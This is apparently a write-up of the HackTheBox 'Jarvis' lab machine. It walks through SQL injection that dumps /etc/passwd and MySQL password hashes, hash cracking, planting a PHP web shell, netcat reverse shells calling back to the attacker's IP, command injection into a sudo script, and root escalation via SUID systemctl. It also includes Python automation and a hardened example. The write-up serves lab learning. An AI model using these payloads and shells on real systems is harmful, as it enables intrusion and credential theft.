Jarvis
This is a medium difficulty Linux machine from HackTheBox created by manulqwerty and Gh0spp7. In this scenario, my IP is 10.10.14.56 and the target’s IP is 10.129.16.167
Gathering Information
Before doing anything else, ping the target once to confirm it is reachable (-c 1 sends a single ICMP echo request; no answer can also mean ICMP is filtered, so a missing reply is not proof the host is down).
ping -c 1 10.129.16.167

Using nmap, we scan all ports (-p-), report only the open ones (--open), use the most aggressive timing template (-T5), print progress (-v) and skip DNS resolution (-n). If you want more speed you can use nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.16.167, a suggestion by S4vitaar (note that -Pn skips host discovery and the SYN scan -sS needs root).
nmap -p- --open -T5 -v -n 10.129.16.167

Now we gather additional information on the open ports with nmap's default scripts (-sC) and version detection (-sV).
nmap -sC -sV -p 22,80,64999 10.129.16.167

The important information: port 80 (HTTP) serves a website on Apache, and port 64999 serves another one. We need more details on both, so we run whatweb against each.
whatweb http://10.129.16.167

whatweb http://10.129.16.167:64999

From both, the relevant information is the email address supersecurehotel@logger.htb (which also hints at the logger.htb hostname). Now open the browser and explore the website, looking for a URL with a parameter worth testing.
Browser: http://10.129.16.167
If you pick a room, the URL has a modifiable parameter (cod) that selects the room to display. Let's try two things: first, what happens with an invalid number, and then a SQL injection test by appending or 1=1 -- - to the URL. (The extra "-" after the "--" comment marker keeps the space MySQL requires after "--", which the browser would otherwise trim.)

Browser: http://10.129.16.167/room.php?cod=-1 or 1=1 -- -
This one shows information even though room -1 does not exist, which is a good sign: the condition we appended is being evaluated by the database.
Browser: http://10.129.16.167/room.php?cod=-1 order by 1-- -
Tried order by 1 through 9, but nothing visible happens: with cod=-1 there is no row to sort, so this check only tells us something if the application displays database errors (an invalid column number would produce one).
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,3,4,5,6,7-- -
It shows information once you select seven columns: the UNION row is rendered in place of the missing room, so the original query has 7 columns.

Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,NULL,4,5,6,7-- -
Replacing column 3 with NULL makes the displayed value disappear, so column 3 is the one rendered on the page. There is no doubt that this website is vulnerable to SQL injection; now we test what information we can pull through it.
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,"test",4,5,6,7-- -

Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,database(),4,5,6,7-- -

Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,version(),4,5,6,7-- -

Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,user(),4,5,6,7-- -

Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,load_file("/etc/passwd"),4,5,6,7-- -
Press CTRL + U to view the page source, where the file contents are much easier to read than in the rendered page.

In some cases quote characters or certain strings are blacklisted. Encode the string as a MySQL hex literal with echo "/etc/passwd" | tr -d '\n' | xxd -ps and paste the output with a 0x prefix and no surrounding quotes (quoted, it would be the literal string "0x2f..." rather than the path). The result looks like: http://10.129.16.167/room.php?cod=-1 union select 1,2,load_file(0x2f6574632f706173737764),4,5,6,7-- -
Exploitation
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,schema_name,4,5,6,7 from information_schema.schemata limit 0,1-- -

Only one row is rendered in that column, so either step through the rows with other limits (limit 1,1, limit 2,1, ...) or collapse them all into one value with group_concat(schema_name).
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,table_name,4,5,6,7 from information_schema.tables where table_schema="hotel" limit 0,1-- -

Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema="hotel" and table_name="room" limit 0,1-- -

From this table we can get the information of every room; you can use sqlmap to get the same information (details at the bottom). More interesting is the mysql.user table, which the application's database account turns out to be allowed to read:
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,group_concat(User,0x3a,Password),4,5,6,7 from mysql.user-- -
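The column-count and extraction steps above can be automated. The following is an added example, not code from the original writeup: it reproduces the manual 1,2,3,...,7 probing with a marker in every column, then fences the value it extracts with hex literals so it can be cut out of the HTML. The helper names and marker scheme are my own, and fake_fetch() is a constructed stand-in for room.php (seven columns, third one rendered, made-up data) so the script runs offline; room.php?cod= and the 7-column UNION come from the page.

```python
"""Automating the UNION-based probing done by hand above.

Added example, not code from the original writeup. The marker scheme,
the helper names and fake_fetch() (a constructed stand-in for the target)
are assumptions; room.php?cod= and the 7-column UNION come from the page.
"""
import re
import urllib.parse
from typing import Callable, List, Optional, Tuple

BASE = "http://10.129.16.167/room.php"  # target URL from the writeup


def hexlit(s: str) -> str:
    """MySQL hex literal: '/etc/passwd' -> 0x2f6574632f706173737764.
    Unquoted, so it survives filters that reject quote characters."""
    return "0x" + s.encode().hex()


def union_payload(values: List[str], tail: str = "") -> str:
    """cod=-1 selects no real row, so only the UNION row is rendered."""
    sel = ",".join(values) + (" " + tail if tail else "")
    return f"-1 union select {sel}-- -"


def build_url(payload: str) -> str:
    return BASE + "?cod=" + urllib.parse.quote(payload, safe=",()*=")


def find_column_count(fetch: Callable[[str], str], max_cols: int = 20) -> Tuple[int, List[int]]:
    """The manual 1,2,3,...,7 probing: try 1..max_cols columns, each carrying
    its own marker. The first count whose page shows any marker is the real
    column count, and the markers that appear tell us which columns render."""
    for n in range(1, max_cols + 1):
        values = [hexlit(f"~m{i}~") for i in range(1, n + 1)]
        body = fetch(build_url(union_payload(values)))
        shown = [i for i in range(1, n + 1) if f"~m{i}~" in body]
        if shown:
            return n, shown
    raise RuntimeError(f"no UNION with up to {max_cols} columns was reflected")


def extract(fetch: Callable[[str], str], ncols: int, col: int, expr: str, tail: str = "") -> Optional[str]:
    """Put expr in the rendered column, fenced by hex markers so the value can
    be cut cleanly out of the surrounding HTML."""
    values = [str(i) for i in range(1, ncols + 1)]
    values[col - 1] = f"concat({hexlit('<<')},{expr},{hexlit('>>')})"
    body = fetch(build_url(union_payload(values, tail)))
    m = re.search(r"<<(.*?)>>", body, re.S)
    return m.group(1) if m else None


# --- constructed stand-in for the target, so this runs offline -------------
def _split_top_level(s: str) -> List[str]:
    """Split on commas that are not inside parentheses."""
    parts, depth, cur = [], 0, ""
    for ch in s:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            parts.append(cur)
            cur = ""
        else:
            cur += ch
    return parts + [cur]


def _evaluate(expr: str, tail: str) -> str:
    """Toy evaluator for the few expressions the helpers emit (made-up data)."""
    expr = expr.strip()
    if expr.startswith("0x"):
        return bytes.fromhex(expr[2:]).decode()
    if expr.startswith("concat(") and expr.endswith(")"):
        return "".join(_evaluate(p, tail) for p in _split_top_level(expr[7:-1]))
    if expr == "database()":
        return "hotel"
    if expr == "group_concat(schema_name)" and tail == "from information_schema.schemata":
        return "information_schema,hotel,mysql"
    return expr


def fake_fetch(url: str) -> str:
    """Behaves like room.php with a 7-column query whose 3rd column is shown.
    Against the real host use requests.get(url).text (with your PHPSESSID)."""
    cod = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)["cod"][0]
    m = re.match(r"-1 union select (.*?)(?: (from .*?))?-- -$", cod)
    if not m:
        return "<html>room not found</html>"
    cols = _split_top_level(m.group(1))
    if len(cols) != 7:
        return "<html>The used SELECT statements have a different number of columns</html>"
    return "<html><td>" + _evaluate(cols[2], m.group(2) or "") + "</td></html>"


if __name__ == "__main__":
    ncols, shown = find_column_count(fake_fetch)
    print(ncols, shown)                              # 7 [3]
    print(extract(fake_fetch, ncols, shown[0], "database()"))
    print(extract(fake_fetch, ncols, shown[0], "group_concat(schema_name)",
                  "from information_schema.schemata"))
```

Swap fake_fetch for a real HTTP fetch and the same two calls walk information_schema exactly as the Browser lines above do; the fence around the value is what makes the output parseable regardless of the surrounding page layout.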

This is the relevant part: we now have the administrator's password hash, DBadmin:*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0, but it is a hash, not an encrypted value, so it has to be cracked rather than decrypted.
Browser: https://crackstation.net/

If the hash is more complex and not in crackstation.net, use hashid or hash-identifier in your terminal to identify the type, then run hashcat -m 300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt, where hash.txt contains the target hash and -m is the mode (300 = MySQL4.1/MySQL5). hashcat expects just the 40 hex characters for this mode, so strip the leading * before saving the hash to hash.txt.
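To see what hashcat mode 300 actually computes, here is an added example (not part of the original writeup) that reimplements the MySQL 4.1+ PASSWORD() scheme and runs a small dictionary check against it. The hash constant is the one dumped from mysql.user above; the mini-wordlist is constructed and is not claimed to contain the real password.

```python
"""Verifying a dumped MySQL password hash offline (added example, not
from the original writeup; the wordlist below is constructed)."""
import hashlib
from typing import Iterable, Optional

# Hash dumped from mysql.user earlier in the walkthrough.
DBADMIN_HASH = "*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0"


def mysql41_hash(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' + uppercase hex of SHA1(SHA1(pw)), where the
    inner digest is fed in as raw bytes, not as hex text."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def hashcat_form(mysql_hash: str) -> str:
    """What goes into hash.txt for hashcat -m 300: the 40 hex characters
    without the leading asterisk."""
    return mysql_hash.lstrip("*").lower()


def crack(target: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate whose hash matches."""
    target = target.upper()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if mysql41_hash(candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini-wordlist; swap in
    # open("/usr/share/wordlists/rockyou.txt", encoding="latin-1") for a real run.
    words = ["password", "123456", "hunter2", "letmein"]
    print(hashcat_form(DBADMIN_HASH))
    print(crack(DBADMIN_HASH, words) or "not in this wordlist")
```

The double SHA-1 with no salt is why these hashes fall to a wordlist so quickly; the same function also lets you confirm a candidate found elsewhere without touching the target again.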
MACHINE RESET - NEW IP (10.129.212.38)
Now that we have the administrator's username and password we need a place to log in, and nmap's http-enum script can help find one.
nmap --script http-enum -p80 10.129.212.38

phpMyAdmin is the obvious place to test the new username and password: open your browser and go to http://10.129.212.38/phpmyadmin/


This is extremely important: from phpMyAdmin we can run arbitrary SQL queries against the host, including writing files to disk when the account has the FILE privilege. As an example, a SELECT ... INTO OUTFILE under the web root produces a file we can then fetch over HTTP:

Browser: http://10.129.212.38/datatest.txt

But enough exploration. Since the account can write files into the web root, the next step drops a PHP file there through the same injection so we can run commands on the machine:
Browser: http://10.129.212.38/room.php?cod=-1 union select 1,2,"<?php system('whoami'); ?>",4,5,6,7 into outfile "/var/www/html/testing.php"-- -
Browser: http://10.129.212.38/testing.php

We can execute commands, so we turn this into a web shell that takes its command from a request parameter, and from there into a reverse shell.
Browser: http://10.129.212.38/room.php?cod=-1 union select 1,2,"<?php system($_REQUEST['cmd']); ?>",4,5,6,7 into outfile "/var/www/html/CMD.php"-- -
Browser: http://10.129.212.38/CMD.php

Column 3 now renders empty (the PHP tag was executed instead of being printed), and we control what runs by adding ?cmd=COMMAND to the URL.
Browser: http://10.129.212.38/CMD.php?cmd=whoami

So now we want an interactive bash shell, which takes two steps: start a listener on our machine, then make the target connect back to it.
nc -nlvp 443
Browser: http://10.129.212.38/CMD.php?cmd=which nc
This checks that nc exists on the target before we rely on it.
Browser: http://10.129.212.38/CMD.php?cmd=nc -e /bin/bash 10.10.14.56 443

We are in, so now we only need a TTY treatment to get a fully functional shell with shortcuts (script /dev/null -c bash, then background it, stty raw -echo; fg, reset, and export TERM=xterm).
cd /home/pepper
ls -l

id
sudo -l

We are www-data, as expected, but sudo -l shows this user may run /var/www/Admin-Utilities/simpler.py as pepper without a password.
sudo -u pepper /var/www/Admin-Utilities/simpler.py

vi /var/www/Admin-Utilities/simpler.py

It looks like a small network test and defense utility. The -p (ping) option is the exploitable part: the address we type is checked against a short blacklist of shell characters and then concatenated into a shell command, and $( ) command substitution is not on that list. First we need to create a script file for the substitution to run.
cd /tmp/
vi reverse.sh
#!/bin/bash
nc -e /bin/bash 10.10.14.56 443
chmod +x reverse.sh
Now open a new local terminal, because reverse.sh will connect back to that listener.
nc -nlvp 443
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
When the script asks for the address to ping, enter:
$(bash /tmp/reverse.sh)

The second terminal now holds a shell on the victim as pepper; apply the same TTY treatment there.
cd
ls
cat user.txt
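Looking back at why $(bash /tmp/reverse.sh) got through simpler.py: the following is an added example, not the script from the box. It mirrors the weak pattern (blacklist a few separators, then string-concatenate into a shell line) next to a hardened version that validates the input as an IP address and never involves a shell. The FORBIDDEN list is an assumption standing in for the real blacklist, not copied from the page, and nothing in the block executes a command.

```python
"""Why "$(bash /tmp/reverse.sh)" gets past simpler.py's ping option.

Added example, not the script from the box. FORBIDDEN is an assumption
standing in for the real blacklist (it was not copied from the page), and
vulnerable_ping_command() only returns the string os.system() would get;
nothing here executes a command."""
import ipaddress
import re
from typing import List, Optional

FORBIDDEN = ["&", ";", "-", "`", "||", "|"]   # assumed blacklist
SUBSTITUTION = re.compile(r"\$\(")            # what such a blacklist misses: $( )


def blacklist_ok(user_input: str) -> bool:
    return not any(tok in user_input for tok in FORBIDDEN)


def vulnerable_ping_command(user_input: str) -> Optional[str]:
    """The weak pattern: blacklist a few separators, then concatenate the
    input into a shell line. None stands for the script's rejection branch."""
    if not blacklist_ok(user_input):
        return None
    return "ping " + user_input          # os.system() would hand this to /bin/sh


def safe_ping_argv(user_input: str) -> List[str]:
    """Hardened version: require a syntactically valid IP address and hand an
    argv list to subprocess.run() (no shell, so no substitution or chaining)."""
    ip = ipaddress.ip_address(user_input.strip())   # ValueError on anything else
    return ["ping", "-c", "1", str(ip)]


if __name__ == "__main__":
    for attempt in ["10.10.14.56", "10.10.14.56; id", "$(bash /tmp/reverse.sh)"]:
        cmd = vulnerable_ping_command(attempt)
        note = "  <- shell would substitute this" if cmd and SUBSTITUTION.search(cmd) else ""
        print(f"{attempt!r:32} -> {cmd!r}{note}")
    print(safe_ping_argv("10.10.14.56"))
```

The point is not the exact blacklist: any filter that tries to enumerate bad characters in front of os.system() loses to the next syntax it forgot, whereas parsing the value into a type (here an IP address) and passing argv without a shell leaves nothing to substitute.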

Privilege Escalation
For privilege escalation, a good practice is to look for a custom command or anything unusual to abuse, starting with SUID binaries.
cd /
id
find / -perm -4000 2>/dev/null

This lists every SUID file on the system; here systemctl is our target. Because it runs as root, we can register a service unit that we control, and the command in its ExecStart will run as root.

mkdir /home/pepper/privesc
cd /home/pepper/privesc
cp /tmp/reverse.sh privesc.sh
Edit privesc.sh so it connects back to port 444 instead of 443; we don't want to disturb the listener that already holds the pepper shell.

nano privesc.service
The unit needs a [Service] section whose ExecStart runs /bin/bash /home/pepper/privesc/privesc.sh (systemd requires absolute paths) and an [Install] section with WantedBy=multi-user.target so that enable has something to act on.

Open a new terminal and start the second listener, then link and start the unit from the pepper shell:
nc -nlvp 444
systemctl link /home/pepper/privesc/privesc.service
systemctl enable --now /home/pepper/privesc/privesc.service

The port 444 listener now holds a root shell. Apply the TTY treatment once more:
script /dev/null -c bash
ls
cd root
ls
cat root.txt

Alternative: SQLmap
At the SQL step, another option is to use sqlmap. First grab your PHPSESSID cookie from the browser so sqlmap sends the same session.

sqlmap -u "http://10.129.16.167/room.php?cod=1" --cookie='PHPSESSID=sc0us610ooevshi902rqdq98d4' --dbs

sqlmap -u "http://10.129.16.167/room.php?cod=1" --cookie='PHPSESSID=sc0us610ooevshi902rqdq98d4' -D hotel --tables

sqlmap -u "http://10.129.16.167/room.php?cod=1" --cookie='PHPSESSID=sc0us610ooevshi902rqdq98d4' -D hotel -T room --dump

sqlmap stores the dump under its output directory; go there to read the file, or move it into your current directory with: mv /home/robertoalfaro/.local/share/sqlmap/output/10.129.16.167/dump/hotel/room.csv .

You can do the same to get the credentials from the database named mysql (the user table, which we read by hand with group_concat earlier).